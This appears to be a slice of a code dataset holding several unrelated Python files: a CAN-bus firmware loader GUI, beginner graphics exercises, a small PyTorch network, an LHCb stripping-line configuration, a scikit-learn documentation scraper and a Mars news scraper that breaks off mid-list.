self.QueueProgressBar.qsize() > 0:\n                progress = self.QueueProgressBar.get(0)\n                self.progressBar['value'] = progress\n                self.statusbarText.set(\"{:.2f}\".format(progress) + \"%\")\n        except queue.Empty:\n            pass #no data\n        if self.__workingAction == WorkingAction.wa_PROGRAMMING or \\\n                self.__workingAction == WorkingAction.wa_VERIFYING or \\\n                self.__workingAction == WorkingAction.wa_DEVICE_READING:\n            self.master.after(250, self.StatusBarUpdaterFunction)\n        elif self.__workingAction == WorkingAction.wa_NONE:\n            self.progressBar['value'] = 0\n            self.__add_log_msg__(\"Operation done\")\n            self.statusbarText.set(\"Operation done\")\n            self.labelStatus['text'] = \"Ready\"\n            self.labelStatus.config(bg=\"green\")\n            self.__switch_controls__(te_OperationState.os_END)\n        elif self.__workingAction == WorkingAction.wa_ERROR or self.__workingAction == WorkingAction.wa_HARDWARE_ERROR:\n            self.labelStatus['text'] = \"Error\"\n            self.labelStatus.config(bg=\"red\")\n            self.__switch_controls__(te_OperationState.os_END)\n        return\n\n    def buttonProgramFlashClick(self):\n        self.__workingAction = WorkingAction.wa_PROGRAMMING\n        self.__switch_controls__(te_OperationState.os_BEGIN)\n        self.__add_log_msg__(\"Move to bootloader: done.\")\n        # creating new thread for sync operations\n        Thread(target=self.FirmwareProgrammerFunction).start()\n        self.master.after(250, self.StatusBarUpdaterFunction)\n        self.labelStatus['text'] = \"Programming\"\n        self.labelStatus.config(bg=\"blue\")\n        return\n\n    def FirmwareReaderFunction(self, saveFilePath):\n        try:\n            current_device = self.comboboxFoundCanDevices.current()\n            self.canLoaderController.move_mcu_to_bootloader(current_device)\n            # drain any stale service messages (queue.Queue.empty() only reports state)\n            while not self.QueueThreadReadingService.empty():\n                self.QueueThreadReadingService.get_nowait()\n            self.CurrentDeviceBootloaderState = te_CurrentDeviceBootloaderState.bs_InBootloader\n            self.canLoaderController.download_firmware_file(current_device, saveFilePath, self.QueueProgressBar,\n                                                            self.QueueThreadReadingService)\n            self.__workingAction = WorkingAction.wa_NONE\n            self.__add_log_msg__(\"Reading completed successfully\")\n        except CANfoxHardwareException as e:\n            self.__add_log_msg__(\"Hardware error: \" + str(e))\n            self.__workingAction = WorkingAction.wa_HARDWARE_ERROR\n        except Exception as e:\n            self.__add_log_msg__(\"Reading error: \" + str(e))\n            self.__workingAction = WorkingAction.wa_ERROR\n        else:\n            self.__workingAction = WorkingAction.wa_NONE\n        return\n\n    def buttonReadFlashClick(self):\n        filename = filedialog.asksaveasfilename(initialdir=\"/\", title=\"Select file to save encoded firmware data\",\n                                                 filetypes=((\"Encoded bin file\", \"*.bin\"), (\"All files\", \"*.*\")))\n        if len(filename) != 0 and os.access(os.path.dirname(filename), os.W_OK):\n            current_device = self.comboboxFoundCanDevices.current()\n            self.canLoaderController.move_mcu_to_bootloader(current_device)\n            self.__add_log_msg__(\"Move to bootloader: done.\")\n            # creating new thread for sync operations\n            self.__workingAction = WorkingAction.wa_DEVICE_READING\n            self.__switch_controls__(te_OperationState.os_BEGIN)\n            self.__add_log_msg__(\"Reading target...\")\n            Thread(target=self.FirmwareReaderFunction, args=(filename,)).start()\n            self.master.after(250, self.StatusBarUpdaterFunction)\n            self.labelStatus['text'] = \"Reading\"\n            self.labelStatus.config(bg=\"aqua\")\n        else:\n            if len(filename) != 0:\n                self.__add_log_msg__(\"Loader has no write permission (administrator rights?) for: \" + str(filename))\n\n    #events\n    def comboboxFoundCanDevices_Selected(self, event):\n        self.CurrentDeviceBootloaderState = te_CurrentDeviceBootloaderState.bs_Unknown\n\n        return\n\n    def comboboxCANSpeed_Selected(self, event):\n        baudrate = self.comboboxCANSpeed['values'][self.comboboxCANSpeed.current()]\n        self.settings.set(\"CAN\", \"BaudRate\", baudrate)\n        return\n\n    def comboboxCANOpenSelfId_Selected(self, event):\n        nodeid = self.comboboxCANOpenSelfId['values'][self.comboboxCANOpenSelfId.current()]\n        self.settings.set(\"CANOpen\", \"NodeID\", nodeid)\n        return\n\n    def client_exit(self):\n        self.master.destroy()\n        return\n\n\n\n\n\ndef WinMain():\n    root = tk.Tk()\n    # size of the window\n\n    # MainApplication(root).pack(side=tk.TOP,fill=tk.BOTH,expand=tk.YES)\n    app = MainApplication(root)\n    # sizexx = app.winfo_width()\n\n\nif __name__ == \"__main__\":\n    WinMain()\n\n\n\n    '''def process_queue(self):\n    try:\n        while self.QueueIncomingMessages.qsize() > 0:\n            msg = self.QueueIncomingMessages.get(0)\n            s_data = \"\"\n            for y in range(0, msg.by_len):\n                s_data += \"[\" + str(y) + \"] = \" + str(hex(msg.aby_data[y])) + \"; \"\n            self.flLstResults.insert(tk.END, \"l_id: \" + str(hex(msg.l_id)) + \" by_len: \" + str(\n                msg.by_len) + \" by_msg_lost: \" + str(msg.by_msg_lost) +\n                                     \" by_extended: \" + str(msg.by_extended) + \" by_remote: \" + str(\n                msg.by_remote) + \" ul_tstamp: \" + str(msg.ul_tstamp) + \" Data = \" + s_data)\n            #self.flLstResults.select_clear(self.flLstResults.size() - 2)  # Clear the current selected item\n            #self.flLstResults.select_set(tk.END)  # Select the new item\n            if self.flLstResults.size() > 100:\n                self.flLstResults.delete(0)\n            self.flLstResults.yview(tk.END)  # Set the scrollbar to the end of the listbox\n    except queue.Empty:\n        pass #no data\n    self.master.after(100, self.process_queue)\n'''\n\n    '''self.sieca_lib = sieca132_client()\n\n        l_netnumber = 105\n        l_txtimeout = -1\n        l_rxtimeout = -1\n\n        c_canAppName = \"canAppName\"\n        c_ReceiverEventName = \"RE1\"\n        c_ErrorEventName = \"EE1\"\n\n        d_retval = self.sieca_lib.canOpen(l_netnumber, 0, 0, l_txtimeout, l_rxtimeout, c_canAppName,\n                                          c_ReceiverEventName, c_ErrorEventName)\n        # self.flLstResults.insert(tk.END, CANTypeDefs.ReturnValues(d_retval[\"l_retval\"]), d_retval[\"handle\"])\n        self.siecaLibHandle = d_retval[\"handle\"]\n        # siecaDllInfo = CANTypeDefs.st_InternalDLLInformation()\n        # res = self.sieca_lib.canGetDllInfo(ctypes.addressof(siecaDllInfo))\n        self.flLstResults.insert(tk.END, \"sieca_lib: \" + str(self.sieca_lib))\n        # self.flLstResults.insert(tk.END, CANTypeDefs.ReturnValues(res))\n        # self.flLstResults.insert(tk.END, siecaDllInfo.aui_TxCounter)\n\n        l_retval = 
self.sieca_lib.canSetBaudrate(self.siecaLibHandle,\n int(CANTypeDefs.Baudrate.BAUD_250)) # 250 kbits/sec\n self.flLstResults.insert(tk.END, \"Set Baudrate: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n sleep(5)\n l_retval = self.sieca_lib.canBlinkLED(self.siecaLibHandle, 0, 0b111, 0b101)\n self.flLstResults.insert(tk.END, \"LED flashing settings applied: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n l_retval = self.sieca_lib.canIsNetOwner(d_retval[\"handle\"])\n self.flLstResults.insert(tk.END, \"CanIsNetOwner: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n\n l_retval = self.sieca_lib.canSetFilterMode(self.siecaLibHandle, CANTypeDefs.T_FILTER_MODE.filterMode_nofilter)\n self.flLstResults.insert(tk.END, \"CanSetFilterMode: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n message_reader = ThreadCANMsgReader(self.siecaLibHandle, self.sieca_lib, self.QueueIncomingMessages)\n message_reader.start()\n # d_retval = self.sieca_lib.canRead(self.siecaLibHandle)\n # self.flLstResults.insert(tk.END, \"DataCount: \" + str(d_retval[\"l_len\"]))\n # self.flLstResults.insert(tk.END, \"DataCount: \" + str(CANTypeDefs.ReturnValues(d_retval[\"l_retval\"])))\n\n self.process_queue()'''\n\n '''for x in range(0, d_retval[\"l_len\"].value):\n canmessage = d_retval[\"canmsg\"][x]\n # canmessage.aby_data\n s_data = \"\"\n for y in range(0, canmessage.by_len):\n s_data += \"[\" + str(y) + \"] = \" + str(hex(canmessage.aby_data[y])) + \"; \"\n\n self.flLstResults.insert(tk.END, \"l_id: \" + str(hex(canmessage.l_id)) + \" by_len: \" + str(\n canmessage.by_len) + \" by_msg_lost: \" + str(canmessage.by_msg_lost) +\n \" by_extended: \" + str(canmessage.by_extended) + \" by_remote: \" + str(\n canmessage.by_remote) + \" ul_tstamp: \" + str(canmessage.ul_tstamp) + \" Data = \" + s_data)\n\n # l_retval = sieca_lib.canClose(d_retval[\"handle\"])\n # self.flLstResults.insert(tk.END, CANTypeDefs.ReturnValues(l_retval))\n '''","sub_path":"CANLoaderMainWindow.py","file_name":"CANLoaderMainWindow.py","file_ext":"py","file_size_in_byte":47634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"465207899","text":"from graphics import *\nimport math\n\n\ndef drawStickFigure():\n win = GraphWin(\"Stick figure\")\n head = Circle(Point(100, 60), 20)\n head.draw(win)\n body = Line(Point(100, 80), Point(100, 120))\n body.draw(win)\n arms = Line(Point(75,95), Point(125,95))\n arms.draw(win)\n legl = Line(Point(75,145), Point(100,120))\n legl.draw(win)\n legr = Line(Point(125,145),Point(100,120))\n legr.draw(win)\n win.mainloop()\n\n\ndef drawLine():\n win = GraphWin(\"Line drawer\")\n for i in range(10):\n message = Text(Point(100,10), \"Click on first point\")\n message.draw(win)\n p1 = win.getMouse()\n message.setText(\"Click on second point\")\n p2 = win.getMouse()\n line = Line(p1, p2)\n line.draw(win)\n message.setText(\"\")\n win.mainloop()\n\n\ndef drawCircle():\n rad = eval(input(\"What is the radius: \"))\n win = GraphWin(\"Circle\")\n circle = Circle(Point(100,100), rad)\n circle.draw(win)\n win.mainloop()\n\n\ndef drawArcheryTarget():\n win = GraphWin(\"Archery Target\", 200, 200)\n center = Point(100,100)\n white = Circle(center, 75)\n white.setFill(\"white\")\n white.draw(win)\n black = Circle(center,60)\n black.setFill(\"black\")\n black.draw(win)\n blue = Circle(center, 45)\n blue.setFill(\"blue\")\n blue.draw(win)\n red = Circle(center,30)\n red.setFill(\"red\")\n red.draw(win)\n yellow = Circle(center, 15)\n yellow.setFill(\"yellow\")\n yellow.draw(win)\n 
win.mainloop()\n\n\ndef drawRectangle():\n height = eval(input(\"Height of the rectangle: \"))\n width = eval(input(\"Width of the rectangle: \"))\n win = GraphWin(\"Rectangle\", 200, 200)\n ul = Point((100-(width/2)),(100-(height/2)))\n br = Point((100+(width/2)),(100+(height/2)))\n rect = Rectangle(ul,br)\n rect.draw(win)\n win.mainloop()\n\n\ndef blueCircle():\n win = GraphWin(\"Blue Circle\")\n while True:\n p = win.getMouse()\n cen = Point(p.getX(),p.getY())\n c = Circle(cen, 50)\n c.setFill(\"blue\")\n c.draw(win)\n win.mainloop()\n\n\ndef tenStrings():\n win = GraphWin(\"Ten Strings\")\n msg = Entry(Point(100,10), 10)\n msg.draw(win)\n for i in range(10):\n p = win.getMouse()\n cen = Point(p.getX(), p.getY())\n msgstr = Text(cen, msg.getText())\n msgstr.draw(win)\n win.mainloop()\n\n\ndef tenColouredRectangles():\n win = GraphWin(\"10 Rectangles\")\n col = Entry(Point(100,10), 10)\n col.setText(\"blue\")\n col.draw(win)\n for i in range(10):\n p = win.getMouse()\n tl = Point(p.getX(), p.getY())\n p = win.getMouse()\n br = Point(p.getX(), p.getY())\n r = Rectangle(tl,br)\n r.setFill(col.getText())\n r.draw(win)\n win.mainloop()\n\n\ndef fiveClickStickFigure():\n win = GraphWin(\"Stick Figure\")\n p = win.getMouse()\n x1 = p.getX()\n y1 = p.getY()\n cen = Point(x1,y1)\n p = win.getMouse()\n dis = math.sqrt((p.getX() - x1)**2 + (p.getY() - y1)**2)\n c = Circle(cen, dis)\n c.draw(win)\n p = win.getMouse()\n bottom = p.getY()\n body = Line(Point(x1,(y1+dis)), Point(x1, p.getY()))\n body.draw(win)\n p = win.getMouse()\n arm = Line(Point(x1, p.getY()), Point(p.getX(), p.getY()))\n dis = p.getX() - x1\n arm2 = Line(Point(x1, p.getY()), Point(x1 - dis, p.getY()))\n arm.draw(win)\n arm2.draw(win)\n p = win.getMouse()\n leg = Line(Point(p.getX(), p.getY()), Point(x1, bottom))\n dis = p.getX() - x1\n leg2 = Line(Point(x1, bottom), Point(x1 - dis, p.getY()))\n leg.draw(win)\n leg2.draw(win)\n win.mainloop()\n\n\ndef plotRainfall():\n win = GraphWin(\"Rainfall\", 220, 220)\n numin = Entry(Point(110,10),5)\n msg = Text(Point(110,30), \"Click to Plot\")\n msg.draw(win)\n numin.draw(win)\n x1 = 25\n x2 = 50\n y1 = 200\n for i in range(7):\n p = win.getMouse() #wait for a mouse click\n y2 = eval(numin.getText())*2 #get height of bar\n y2 = y1 - y2 #have second coord above first\n bcord = Point(x1,y1) #set bottom coord\n tcord = Point(x2, y2) #set top coord\n bar = Rectangle(bcord, tcord) #create rectangle\n bar.setFill(\"blue\") #set rectangle colour to blue\n num = Text(Point(x1 + 12, y1 + 10), numin.getText()) #create label of bar height\n num.draw(win) #draw label\n x1 += 25 #move x-coords across for next bar\n x2 += 25 #move x-coords across for next bar\n bar.draw(win) #draw rectangle\n win.mainloop()\n\n#drawStickFigure()\n#drawLine()\n#drawCircle()\n#drawArcheryTarget()\n#drawRectangle()\n#blueCircle()\n#tenStrings()\n#tenColouredRectangles()\nfiveClickStickFigure()\n#plotRainfall()","sub_path":"Uni Work/Jake/Prac - 3.py","file_name":"Prac - 3.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"160488911","text":"import torch.nn.functional as F\nimport torch as tc\nimport numpy as np\n\nclass SimpleNet(tc.nn.Module):\n def __init__(self,dropout,features=3):\n super(SimpleNet,self).__init__()\n self.is_training=False\n self.conv1=tc.nn.Conv2d(features,8,kernel_size=(5,5))\n self.conv2=tc.nn.Conv2d(8,8,kernel_size=(3,3))\n self.drop=tc.nn.Dropout(dropout)\n # Net created for input_files 16*16\n 
self.fc1=tc.nn.Linear(100*8,256)\n self.fc2=tc.nn.Linear(256,1)\n\n def forward(self,x):\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n x = x.view(-1,100*8)\n if self.is_training:\n x = self.drop(x)\n x = F.relu(self.fc1(x))\n if self.is_training:\n x = self.drop(x)\n x= tc.sigmoid(self.fc2(x))\n #x = self.fc2(x)\n return x","sub_path":"NeuralNets.py","file_name":"NeuralNets.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"612416124","text":"'''\nD -> phi pi cross-section lines\n\nAdapted to current stripping framework by P. Spradlin.\n'''\n\n__author__ = ['Conor Fitzpatrick', 'Patrick Spradlin']\n__date__ = '03/09/2010'\n__version__ = '$Revision: 1.4 $'\n\n__all__ = ( 'StrippingD2PhiPiForXSecConf',\n 'makePhi2KK',\n 'makeD2PhiPi',\n 'default_config' )\n\n\nfrom Gaudi.Configuration import *\nfrom StrippingConf.StrippingLine import StrippingLine\nfrom GaudiKernel.SystemOfUnits import MeV, mrad\nfrom LHCbKernel.Configuration import *\n#from Configurables import FilterDesktop, CombineParticles\nfrom GaudiConfUtils.ConfigurableGenerators import FilterDesktop, CombineParticles\nfrom PhysSelPython.Wrappers import Selection\nfrom StrippingUtils.Utils import LineBuilder\nimport StandardParticles\nif hasattr(StandardParticles, \"StdAllNoPIDsPions\"):\n from StandardParticles import StdAllNoPIDsPions\nelse:\n from StandardParticles import StdNoPIDsPions as StdAllNoPIDsPions\nif hasattr(StandardParticles, \"StdAllNoPIDsKaons\"):\n from StandardParticles import StdAllNoPIDsKaons\nelse:\n from StandardParticles import StdNoPIDsKaons as StdAllNoPIDsKaons\n \nclass StrippingD2PhiPiForXSecConf(LineBuilder): # {\n\n __configuration_keys__ = ( 'K_BPVIPCHI2_MIN'\n , 'Pi_BPVIPCHI2_MIN'\n , 'K_PIDK_MIN'\n , 'Phi_M_MIN'\n , 'Phi_M_MAX'\n , 'D_AM_MIN'\n , 'D_AM_MAX'\n , 'D_VCHI2VDOF_MAX'\n , 'D_acosBPVDIRA_MAX'\n , 'D_PVDispCut'\n , 'HltFilter'\n , 'PrescaleD2PhiPi'\n , 'PostscaleD2PhiPi'\n )\n\n\n ## Possible parameters and default values copied from the definition\n ## of StrippingLine\n def _strippingLine ( self,\n name , # the base name for the Line\n prescale = 1.0 , # prescale factor\n ODIN = None , # ODIN predicate\n L0DU = None , # L0DU predicate\n HLT = None , # HltDecReports predicate\n FILTER = None , # 'VOID'-predicate, e.g. 
Global Event Cut\n checkPV = True , # Check PV before running algos\n algos = None , # the list of stripping members\n selection = None ,\n postscale = 1.0 , # postscale factor\n MaxCandidates = \"Override\", # Maxumum number\n MaxCombinations = \"Override\", # Maxumum number\n HDRLocation = None ) : # other configuration parameters\n # {\n\n if (prescale > 0) and (postscale > 0) : # {\n line = StrippingLine( name,\n prescale = prescale,\n ODIN = ODIN,\n L0DU = L0DU,\n HLT = HLT,\n FILTER = FILTER,\n checkPV = checkPV,\n algos = algos,\n selection = selection,\n postscale = postscale,\n MaxCandidates = MaxCandidates,\n MaxCombinations = MaxCombinations,\n HDRLocation = HDRLocation )\n\n self.registerLine(line)\n return line\n # }\n else : \n return False\n\n # }\n\n\n def __init__(self, name, config) : # {\n\n LineBuilder.__init__(self, name, config)\n\n phi2KK_name = name + 'Phi2KK'\n d2PhiPi_name = name + 'D2PhiPi'\n\n self.inPions = StdAllNoPIDsPions\n self.inKaons = StdAllNoPIDsKaons\n\n self.selPhi2KK = makePhi2KK( name = phi2KK_name\n , inputSel = [ self.inPions, self.inKaons ]\n , Daug_BPVIPCHI2_MIN = config['K_BPVIPCHI2_MIN']\n , K_PIDK_MIN = config['K_PIDK_MIN']\n , Comb_M_MIN = config['Phi_M_MIN']\n , Comb_M_MAX = config['Phi_M_MAX']\n )\n\n self.selD2PhiPi = makeD2PhiPi( name = d2PhiPi_name \n , inputSel = [ self.selPhi2KK, self.inPions ]\n , Pi_BPVIPCHI2_MIN = config['Pi_BPVIPCHI2_MIN']\n , Comb_AM_MIN = config['D_AM_MIN']\n , Comb_AM_MAX = config['D_AM_MAX']\n , D_acosBPVDIRA_MAX = config['D_acosBPVDIRA_MAX']\n , D_PVDispCut = config['D_PVDispCut']\n , D_VCHI2VDOF_MAX = config['D_VCHI2VDOF_MAX']\n )\n\n\n self.line_D2PhiPi = self._strippingLine( name = d2PhiPi_name + 'Line',\n HLT = config['HltFilter'],\n prescale = config['PrescaleD2PhiPi'],\n postscale = config['PostscaleD2PhiPi'],\n selection = self.selD2PhiPi\n )\n # }\n\n# }\n\n\ndef makePhi2KK( name\n , inputSel\n , Daug_BPVIPCHI2_MIN\n , K_PIDK_MIN\n , Comb_M_MIN\n , Comb_M_MAX\n , decDescriptors = [ \"phi(1020) -> K+ K-\" ]\n ) : # {\n\n ## Construct a preambulo to simplify some calculations.\n lclPreambulo = [\n \"pidFiducialPMin = 3.0 * GeV\"\n , \"pidFiducialPMax = 100.0 * GeV\"\n ]\n\n daugCuts = \"(HASRICH)\" \\\n \"& (in_range(pidFiducialPMin, P, pidFiducialPMax))\" \\\n \"& (in_range(2.0, ETA, 5.0))\" \\\n \"& ((PIDK-PIDpi) > %(K_PIDK_MIN)s)\" \\\n \"& (BPVIPCHI2() > %(Daug_BPVIPCHI2_MIN)s)\" % locals()\n\n combCuts = \"(AALL)\"\n\n phiCuts = \"(in_range(%(Comb_M_MIN)s, M, %(Comb_M_MAX)s))\" % locals()\n\n\n _phi = CombineParticles(\n DecayDescriptors = decDescriptors\n , Preambulo = lclPreambulo\n , DaughtersCuts = { \"K+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = phiCuts \n )\n\n return Selection( name,\n Algorithm = _phi,\n RequiredSelections = inputSel\n )\n\n# }\n\n\ndef makeD2PhiPi( name\n , inputSel\n , Pi_BPVIPCHI2_MIN\n , Comb_AM_MIN\n , Comb_AM_MAX\n , D_acosBPVDIRA_MAX\n , D_PVDispCut\n , D_VCHI2VDOF_MAX\n , decDescriptors = [ \"[D_s+ -> pi+ phi(1020)]cc\" ]\n ): # {\n\n ## Construct a preambulo to simplify some calculations.\n lclPreambulo = [\n \"from math import cos\"\n , \"bpvdirathresh = cos(%(D_acosBPVDIRA_MAX)s)\" % locals()\n ]\n\n phiCuts = \"(ALL)\"\n piCuts = \"(BPVIPCHI2() > %(Pi_BPVIPCHI2_MIN)s)\" % locals()\n\n combCuts = \"(in_range(%(Comb_AM_MIN)s, AM, %(Comb_AM_MAX)s))\" % locals()\n\n dCuts = \"(VFASPF(VCHI2/VDOF) < %(D_VCHI2VDOF_MAX)s)\" \\\n \"& (%(D_PVDispCut)s)\" \\\n \"& (BPVDIRA > bpvdirathresh) \" % locals()\n\n _dplus = CombineParticles(\n DecayDescriptors = 
decDescriptors\n , Preambulo = lclPreambulo\n , DaughtersCuts = { \"pi+\" : piCuts, \"phi(1020)\" : phiCuts }\n , CombinationCut = combCuts\n , MotherCut = dCuts\n )\n\n return Selection( name,\n Algorithm = _dplus,\n RequiredSelections = inputSel\n )\n\n# }\n\n\ndefault_config = {\n 'K_BPVIPCHI2_MIN' : 1.0\n , 'Pi_BPVIPCHI2_MIN' : 1.0\n , 'K_PIDK_MIN' : 0.0\n , 'Phi_M_MIN' : 1000.0 * MeV\n , 'Phi_M_MAX' : 1040.0 * MeV\n , 'D_AM_MIN' : 1770.0 * MeV\n , 'D_AM_MAX' : 2070.0 * MeV\n , 'D_VCHI2VDOF_MAX' : 25.0\n , 'D_acosBPVDIRA_MAX' : 35.0 * mrad\n , 'D_PVDispCut' : \"((BPVVDCHI2 > 16.0)|(BPVLTIME() > 0.150 * picosecond))\"\n , 'HltFilter' : None\n #\n , 'PrescaleD2PhiPi' : 1.0\n , 'PostscaleD2PhiPi' : 1.0\n }\n\n\n","sub_path":"DaVinciDev_v38r1p1/Phys/StrippingArchive/python/StrippingArchive/Stripping20r2/StrippingD2PhiPiForXSec.py","file_name":"StrippingD2PhiPiForXSec.py","file_ext":"py","file_size_in_byte":8902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"428348387","text":"import bs4\nimport requests\nimport lxml\nimport html5lib\nimport pandas as pd\nimport re\nimport csv\n\n#Variables and arrays\nargument_array = []\nargument_desc_array = []\nvalue = []\n\n#get data from web\nres = requests.get('https://scikit-learn.org/stable/modules/generated/sklearn.svm.SVC.html')\nsoup = bs4.BeautifulSoup(res.text, 'html5lib')\nargument = soup.find('td',class_='field-body')\n\n#Extract arguments\nfor arg in argument.find_all('strong'):\n argument_array.append(arg.text)\n\n#Extract argument description\nfor arg in argument.find_all('dd'):\n argument_desc_array.append(arg.text.replace('\\n',' ').replace('\\t', ''))\n\n#Extract default value with argument\nfor val in argument.find_all('dt'):\n value.append(val.text)\n\nregex = r\"\\(default=.*?\\)|(default:.*)|(default=.*)|\\(default =.*?\\)|(default.*)\"\n\ndefault_value = [None] * len(argument_array)\n\n#Extract default values\nfor i, val in enumerate(value):\n if(val.count('default')==1):\n temp = re.search(regex, value[i]).group()\n temp = temp.replace('default','').replace('=','').replace('(','').replace(')','').replace(':','')\n default_value[i] = temp\n\n#save data\ndf = pd.DataFrame({\"Argument\" : argument_array, \"Description\" : argument_desc_array, \"Default_value\" : default_value})\ndf.to_csv(\"SK_output.csv\", index=False )\n","sub_path":"Performance_Evaluation/SK_WebScraper.py","file_name":"SK_WebScraper.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"156920091","text":"# Mission to Mars\r\n\r\n#Import dependencies\r\n\r\nfrom splinter import Browser\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport pymongo\r\nimport tweepy\r\nimport json\r\nimport pandas as pd\r\nimport time \r\n\r\ndef init_browser():\r\n executable_path = {\"executable_path\": \"/Users/stefa/chromedriver.exe\"}\r\n return Browser(\"chrome\", **executable_path, headless=False)\r\n\r\ndef scrape():\r\n \r\n #Create the dictionary that will store all of the Mars information we scrape\r\n mars_data = {}\r\n \r\n #scrape Nasa data\r\n headline, teaser, date = scrape_mars_headline()\r\n\r\n mars_data[\"nasa_headline\"] = headline\r\n mars_data[\"nasa_teaser\"] = teaser\r\n mars_data[\"nasa_date\"] = date\r\n \r\n #scrape JPL for featured image\r\n featured_image = scrape_JPL_image()\r\n mars_data[\"featured_image\"] = featured_image\r\n \r\n #scrape Twitter for the latest Mars weather tweet\r\n 
mars_weather = mars_weather_tweet()\r\n mars_data[\"weather\"] = mars_weather\r\n \r\n #scrape Mars Facts website to store basic facts on the planet\r\n facts_html_table = mars_facts()\r\n mars_data[\"facts_table\"] = facts_html_table\r\n \r\n #scrape USGS to get images for each of Mars' hemispheres\r\n hemisphere_images = mars_hemispheres()\r\n mars_data[\"hemi_img\"] = hemisphere_images\r\n \r\n return mars_data\r\n\r\n\r\ndef scrape_mars_headline():\r\n\r\n #This function scrapes the Nasa website for the latest news headline\r\n\r\n browser = init_browser()\r\n \r\n # visit https://mars.nasa.gov/news/\r\n mars_news = \"https://mars.nasa.gov/news/\"\r\n browser.visit(mars_news)\r\n \r\n #store the html in a variable called html \r\n html = browser.html\r\n\r\n # create a soup object from the html. This will parse the html we pulled from Nasa website.\r\n soup = BeautifulSoup(html, \"html.parser\")\r\n \r\n #Get the latest article posted on the site. The list_text class has the headline,\r\n # date, and a blurb about the article - \"a teaser\"\r\n \r\n mars_article = soup.find('div', class_='list_text')\r\n\r\n #Now that we have the article, we can get the headline, blurb, and date\r\n mars_headline = mars_article.find('div', class_='content_title').text\r\n mars_teaser = mars_article.find('div', class_='article_teaser_body').text\r\n mars_news_date = mars_article.find('div', class_='list_date').text\r\n \r\n return mars_headline, mars_teaser, mars_news_date \r\n\r\ndef scrape_JPL_image():\r\n \r\n #This function scrapes the JPL website for an image of Mars\r\n\r\n browser = init_browser()\r\n\r\n # visit https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars\r\n mars_jpl = \"https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars\"\r\n \r\n browser.visit(mars_jpl)\r\n\r\n #store the html in a variable called html \r\n html = browser.html\r\n\r\n #click on the button that says \"FULL IMAGE\"\r\n browser.click_link_by_partial_text('FULL IMAGE')\r\n\r\n time.sleep(2)\r\n\r\n #now click on the link that says \"more info\"\r\n browser.click_link_by_partial_text('more info')\r\n\r\n time.sleep(2)\r\n\r\n #we're on a new page so we need to scrape the html again\r\n new_html = browser.html\r\n\r\n #make a beautifulsoup object for the new page\r\n soup = BeautifulSoup(new_html, \"html.parser\")\r\n\r\n image_detail = soup.find('img', class_='main_image')\r\n\r\n full_res_jpeg = image_detail.get('src')\r\n\r\n #now append the jpl nasa front end link\r\n jpl = \"https://www.jpl.nasa.gov\"\r\n\r\n featured_image_url = jpl + full_res_jpeg\r\n\r\n print(f\"JPL Featured Image: {featured_image_url}\")\r\n \r\n return featured_image_url\r\n\r\ndef mars_weather_tweet():\r\n \r\n #get mars weather's latest tweet from the website\r\n\r\n browser = init_browser()\r\n\r\n weather_url = \"https://twitter.com/marswxreport?lang=en\"\r\n browser.visit(weather_url)\r\n\r\n html_weather = browser.html\r\n\r\n soup = BeautifulSoup(html_weather, \"html.parser\")\r\n\r\n mars_weather = soup.find(\"p\", class_=\"TweetTextSize TweetTextSize--normal js-tweet-text tweet-text\").text\r\n\r\n print(f\"Latest Weather Tweet: {mars_weather}\")\r\n \r\n return mars_weather\r\n\r\ndef mars_facts():\r\n\r\n #scrape the space-facts website to get basic data on the planet Mars\r\n\r\n #store the URL for the space facts website\r\n facts_url = \"https://space-facts.com/mars/\"\r\n\r\n #Use pandas to scrape the page for table data\r\n tables = pd.read_html(facts_url)\r\n tables\r\n\r\n facts_df = tables[0]\r\n 
facts_df.columns = ['Fact Type', 'Fact Data']\r\n facts_df\r\n \r\n #Convert the dataframe to an HTML table string\r\n\r\n facts_html_table = facts_df.to_html(header=False, index=False)\r\n\r\n\r\n #strip the \\n characters\r\n facts_html_table = facts_html_table.replace('\\n', '')\r\n \r\n print(facts_html_table)\r\n \r\n return facts_html_table\r\n\r\ndef mars_hemispheres():\r\n\r\n #scrape the entire 'collapsible results' class so that we can loop through each item\r\n\r\n #set the browser variable\r\n browser = init_browser()\r\n\r\n # visit https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars\r\n mars_usgs_url = \"https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars\"\r\n browser.visit(mars_usgs_url)\r\n\r\n\r\n #store the html in a variable called usgs_html \r\n usgs_html = browser.html\r\n\r\n # create a soup object from the html. This will parse the html we pulled from USGS website.\r\n usgs_soup = BeautifulSoup(usgs_html, \"html.parser\")\r\n\r\n #Get the URL for the featured image-full size\r\n\r\n product_box = usgs_soup.find('div', class_='collapsible results')\r\n\r\n #create lists to hold the partial and full links to each hemisphere's page\r\n hemi_links = []\r\n hemi_urls = []\r\n\r\n #pre-load the hemi array because the page is permanently down\r\n\r\n hemisphere_image_urls = [{\"title\" : \"Cerberus Hemisphere\", \"image\" : \"http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/cerberus_enhanced.tif/full.jpg\"},\r\n {\"title\" : \"Schiaparelli Hemisphere\", \"image\" : \"http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/schiaparelli_enhanced.tif/full.jpg\"},\r\n {\"title\" : \"Syrtis Major Hemisphere\", \"image\" : \"http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/syrtis_major_enhanced.tif/full.jpg\"},\r\n {\"title\" : \"Valles Marineris Hemisphere\", \"image\" : 